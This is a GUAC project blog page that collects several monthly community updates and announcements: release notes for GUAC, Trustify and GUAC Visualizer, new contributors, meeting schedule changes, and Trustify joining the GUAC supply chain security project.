GUAC Blog

Welcome to the GUAC Update, a monthly review of what has happened in the GUAC community and what’s coming up. If you have feedback, please let us know. To include something in next month’s update, leave a comment in the issue.

Releases

• Trustify 0.4.1 adds a REST API endpoint for recommended pURLS, along with many other features.

Community

The GUAC Maintainers Meeting is now every-other-week instead of weekly. You can always find the most up-to-date time and location of meetings on the OpenSSF Calendar. Of course, the GUAC public slack channel is always open.

New contributors

• Paul fixed an OSV ingestion issue in GUAC.

Coming up

Several members of the GUAC community will be at Open Source SecurityCon and KubeCon NA in Atlanta, GA, US the week of 10 November. Be sure to join us in the Maintainer Meetings or on Slack to participate in the conversation.

The GUAC Maintainer Meeting is switching from a weekly schedule to bi-weekly. The next meeting will be Monday 17 November. We’re making this switch to better respect people’s time as the meeting agendas have become smaller after the GUAC 1.0 release and Trustify merger.

You can always find the most up-to-date time and location of meetings on the OpenSSF Calendar. Of course, the GUAC public slack channel is always open.

Trustify v0.4.1 is now available. This release provides a new recommendations API endpoint for PURLs to suggest updated package versions and related vulnerability remediations.

The new release also includes the features in the v0.4.0 release from earlier this month:

• Enhanced SBOM Correlation: Improved correlation for SBOMs, especially those without CPEs
• Advanced License Filtering: New filtering capabilities for SBOMs, PURLs, and a dedicated license list endpoint
• Performance and Memory Improvements: Analysis memory consumption has been reduced by approximately 15%, and caching has been improved
• Expanded Vulnerability Scores: Now includes scores from CVSSv4 and CVSSv2
• Storage and GC Enhancements: Added a garbage collection endpoint and improved the deletion process for SBOMs and advisories

Join us

If you’re interested in joining our community or contributing, we’d love to have you.

Welcome to the GUAC Update, a monthly review of what has happened in the GUAC community and what’s coming up. If you have feedback, please let us know. To include something in next month’s update, leave a comment in the issue.

With the addition of Trustify, the community has grown quite a bit.

Releases

• GUAC v1.0.1 includes several bug fixes and dependency updates
• trustify v0.3.6 adds support for deletions and fixes several bugs

Community

New contributors

• Shreyas Pandya fixed a bug in GUAC
• Vilém Obrátil contributed tests to trustify-ui
• Matěj Nesuta made improvements to the trustify-ui CI workflow

Coming up

Be sure to join us in the weekly Maintainer Meetings or on Slack to participate in the conversation.

GUAC v1.0.1 is now available. This patch release largely updates dependencies. It also fixes a bug where an ingestor process could hang when encountering a read error from the NATS pub-sub service. This bug fix was contributed by Shreyas Panyda.

Join us

If you’re interested in joining our community or contributing, we’d love to have you.

Welcome to the GUAC Update, a monthly review of what has happened in the GUAC community and what’s coming up. If you have feedback, please let us know. To include something in next month’s update, leave a comment in the issue.

Releases

guac-visualizer v0.6.0 was released which includes GQL updates for recent GUAC releases and various bug fixes.

Community

The big news is that Trustify has joined the GUAC community. Check out the newly-reconfigured website and docs!

New contributors

• Ruben Romero Montes fixed a bug in the footer of the updated webpage. (guac-landing#154)

Coming up

Be sure to join us in the weekly Maintainer Meetings or on Slack to participate in the conversation.

The superpower of open source is multiple people working together on a common goal. That works for projects, too. GUAC and Trustify are two projects bringing visibility to the software supply chain. Today, they’re combining under the GUAC umbrella. With Red Hat’s contribution of Trustify to the GUAC project, the two combine to create a unified effort to address the challenges of consuming, processing, and utilizing supply chain security metadata at scale.

Why join?

The Graph for Understanding Artifact Composition (GUAC) project was created to bring understanding to software supply chains. GUAC ingests software bills of materials (SBOMs) and enriches them with additional data to create a queryable graph of the software supply chain. Trustify also ingests and manages SBOMs, with a focus on security and compliance. With so much overlap, it makes sense to combine our efforts.

The grand vision for this evolved community is to become the central hub within OpenSSF for initiatives focused on building and using supply chain knowledge graphs. This includes: defining & promoting common standards, data models, & ontologies; developing shared infrastructure & libraries; improving the overall tooling ecosystem; fostering collaboration & knowledge sharing; and providing a clear & welcoming community for contributors.

What’s next?

Right now, we’re working on the basic logistics: migrating repositories, updating websites, merging documentation. We have created a new GUAC Steering Committee that oversees two core projects: Graph for Understanding Artifact Composition (GUAC) and Trustify, and subprojects like sw-id-core and GUAC Visualizer. These projects have their own maintainers, but we expect to see a lot of cross-collaboration as everyone gets settled in.

If you’d like to learn more, join Ben Cotton and Dejan Bosanac at OpenSSF Community Day Europe for their talk on Thursday 28 August. If you can’t make it to Amsterdam, the community page has all of the ways you can engage with our community.

Version 0.6.0 of the GUAC Visualizer is now available. The GUAC Visualizer is an experimental utility that can be used to interact with GUAC services. It acts as a way to visualize the software supply chain graph and explore the supply chain.

Version 0.6.0 includes a fix for handling packages with an empty namespace. It also improves reliability by using Next’s native proxy functionality. Of course, it also comes with dependency updates.

This release includes first-time contributions from:

• @hidde-jan
• @mcombuechen
• @gaganhr94

With this release, we’re also testing GitHub’s Immutable Releases feature (currently in private preview). When used, this feature prevents changing any artifacts after a release is published. Post-release alteration of release contents is a common supply chain attack, so we’re glad to be trying out a feature that will close off that threat. You’ll see the tag “🔒 Immutable” next to the timestamp in the release.

You may notice that the previous release was v0.14.10. The v0.5.0 tag had been applied locally and was accidentally pushed alongside v0.6.0.

With the recent release of GUAC 1.0, the GUAC Maintainers have decided this is a good time to end the monthly community meetings.

When the project started, the monthly community meetings were the main venue for people interested in GUAC to have high-bandwidth discussion. Users and contributed shared use cases, discussed design ideas, and sought help with using pre-1.0 GUAC.

Since the weekly maintainer meetings became public last year, we’ve seen a lot of community members join. This seems to have come at the expense of topics and attendance for the community meeting. It makes sense that if people have something to discuss, they’d rather do it at the next weekly meeting than to wait weeks for the next community meeting. To us, that’s a success.

The weekly maintainer meetings are staying put. If you have something you want to discuss, you’re always welcome to join on Mondays or ask in the #guac channel on the OpenSSF Slack. See the community page for details. Notes from past community meetings will remain available on GitHub and the recordings are on the GUAC YouTube channel.

Welcome to the GUAC Update, a monthly review of what has happened in the GUAC community and what’s coming up. If you have feedback, please let us know. To include something in next month’s update, leave a comment in the issue.

The big news, of course, is that we released GUAC 1.0! This represents contributions from over 400 people representing more than 90 organizations including Kusari, Google, Purdue University, Microsoft, and Red Hat. Download GUAC v1.0 to get started!

Community

New contributors

• Gagan H R fixed an issue in GUAC Visualizer that prevented us from moving to Next 15+. (guac-visualizer#140)
• Ritesh Udgata contributed REST API documentation to the GUAC docs. (guac-docs#164)
• Emmanuel Ferdman fixed a CI warning in GUAC. (guac#2688)

Events

Several members of the GUAC community presented at Open Source Summit North America in Denver:

• Mihai Maruseac was part of a panel “Panel Discussion: Strengthening Software Supply Chains: Harmonizing SLSA Provenance and SPDX SBOM for Better Adoption”
• Brandt Keller presented “Enhancing Supply Chain Security: Integrating Zarf and GUAC for Seamless SBOM Generation and Delivery” at OpenSSF Community Day
• Mihai Maruseac presented “Taming the Wild West of ML: Practical Model Signing With Sigstore on Kaggle” at OpenSSF Community Day

Coming up

Some members of the GUAC community will be presenting at Open Source Summit and OpenSSF Community Day Europe in Amsterdam at the end of August. A detailed listing will be in next month’s GUAC update.

In addition, we’re working to finalize the legal necessities for welcoming the Trustify project under the GUAC umbrella. Stay tuned for details.

In the meantime, be sure to join us in the weekly Maintainer Meetings or on Slack to participate in the conversation.